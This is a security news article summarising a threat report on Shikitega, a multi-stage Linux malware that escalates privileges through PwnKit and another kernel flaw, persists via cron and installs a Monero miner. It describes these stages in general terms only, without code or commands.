A newly identified Linux malware dubbed Shikitega has emerged as a significant threat, utilizing a sophisticated multi-stage infection strategy that targets endpoints and Internet of Things (IoT) devices to install further malicious payloads. This malware raises serious cybersecurity concerns for organizations reliant on Linux platforms, particularly in cloud computing.
According to a report published by AT&T Alien Labs, the malware grants attackers extensive control over compromised systems. The operators can not only manage the devices remotely but also deploy persistent cryptocurrency miners, suggesting a dual motive of exploitation and monetary gain. Shikitega is part of a troubling trend in recent months, with various Linux malware variants surfacing, such as BPFDoor, Symbiote, and Syslogk.
Once deployed on a victim’s system, Shikitega initiates a chain reaction that includes downloading the Metasploit’s Mettle meterpreter, allowing for enhanced control. The attackers exploit specific vulnerabilities to escalate privileges, set up persistence through cron jobs, and ultimately run a cryptocurrency miner on compromised devices. The precise method of initial compromise remains unclear, but the malware’s evasiveness is accentuated by its ability to retrieve and execute payloads directly from a command-and-control (C2) server, executing them in memory to bypass traditional detection measures.
Privilege escalation is facilitated through the exploitation of vulnerabilities such as CVE-2021-4034 (known as PwnKit) and CVE-2021-3493. These vulnerabilities allow attackers to use elevated privileges to execute shell scripts that establish persistence and enable the deployment of a Monero cryptocurrency miner. Such methods are indicative of the tactics outlined in the MITRE ATT&CK framework, specifically focusing on initial access, persistence, and privilege escalation.
To further evade detection, Shikitega employs a Shikata ga nai polymorphic encoder, complicating efforts by antivirus software to identify the malware. The use of legitimate cloud services for command-and-control functions underscores a calculated strategy by the malware operators to exploit existing systems to mask their activities.
The rise of Shikitega highlights a growing threat landscape where malicious actors are increasingly expanding their operations into the Linux ecosystem, a platform widely utilized in cloud servers globally. This shift has been linked to a notable spike in ransomware incidents targeting Linux systems, as evidenced by the Trend Micro 2022 Midyear Cybersecurity Report, which notes a 75% increase in ransomware attacks on Linux in the first half of 2022 compared to the prior year.
As the landscape evolves, researchers warn that threat actors are actively seeking innovative ways to deliver malware while remaining undetected. The nature of Shikitega’s delivery method—gradually unrolling its payload so that each stage reveals only a portion of the total—is characteristic of a calculated approach to avoid cybersecurity defenses.
In light of these developments, it is imperative for organizations utilizing Linux-based systems to remain vigilant. Businesses must consider implementing robust security measures and stay informed of the shifting dynamics in the threat landscape to protect against emerging vulnerabilities.
